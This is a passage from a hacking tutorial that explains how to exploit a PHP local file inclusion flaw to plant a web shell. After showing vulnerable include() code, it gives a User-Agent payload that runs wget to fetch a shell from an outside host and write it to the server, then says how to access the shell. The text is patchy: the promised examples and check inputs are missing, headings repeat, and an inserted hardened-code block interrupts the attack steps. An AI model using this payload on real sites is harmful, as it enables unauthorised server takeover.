3. PHP injection
Remember LFI? This is a tutorial on how to get a shell on a website that is vulnerable to LFI.
Here is an example of code that is vulnerable to LFI:
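<?php
// LFI Vulnerable Code
$redirect = $_GET['redirect'];  // taken straight from the query string, never validated
include($redirect);             // includes whatever path the request supplied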
It is vulnerable because $redirect is not sanitized, therefore include($redirect); will load whatever path is passed in $_GET['redirect'].
Here is an example of LFI on Unix (very old):
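The hardened counterpart of the include above, as an added example that is not part of the original tutorial: the request value is only ever used as a key into a fixed allowlist, and the resolved file must sit under one directory. PAGES_DIR, ALLOWED_PAGES, resolve_page() and the page names are assumptions made for illustration.

```php
<?php
// Added example: allowlist-based replacement for include($_GET['redirect']).
// PAGES_DIR and the page names below are assumptions for illustration.

const PAGES_DIR = __DIR__ . '/pages';

// Request value => file under PAGES_DIR. Only these keys are ever includable.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a request-supplied page name to a file path, or null if rejected.
 */
function resolve_page($name, string $baseDir = PAGES_DIR): ?string
{
    // Arrays (?redirect[]=x) and any value that is not an allowlisted key
    // are rejected, so traversal strings and absolute paths never reach the
    // filesystem at all.
    if (!is_string($name) || !array_key_exists($name, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . ALLOWED_PAGES[$name]);
    // realpath() resolves symlinks and ../ segments; the result must still
    // be inside $base, which catches a symlinked or misplaced page file.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET['redirect'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Not found');
}
include $page;
```

Because the request string is never concatenated into a path, files outside the pages directory cannot be included no matter what headers or parameters the client sends.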
To check if it is vulnerable, we enter this in the ../ part:
If you get something like DOCUMENT_ROOT=SKDOISAJUF()&@#%(#*%, etc., that means it is vulnerable.
If you get only a blank page, it isn't vulnerable.
3. PHP Injection
Now, let's access it and use Tamper Data to change the user agent to this:
<?system('wget http://gonullyourself.org/shell.txt -O gonullyourself.php');?>
Now, submit the request.
Our command will be executed.
4. Accessing the shell
To check if the command got executed, we will enter something like this:
If our shell is there, the command was successfully executed.
Easy :) Isn't it?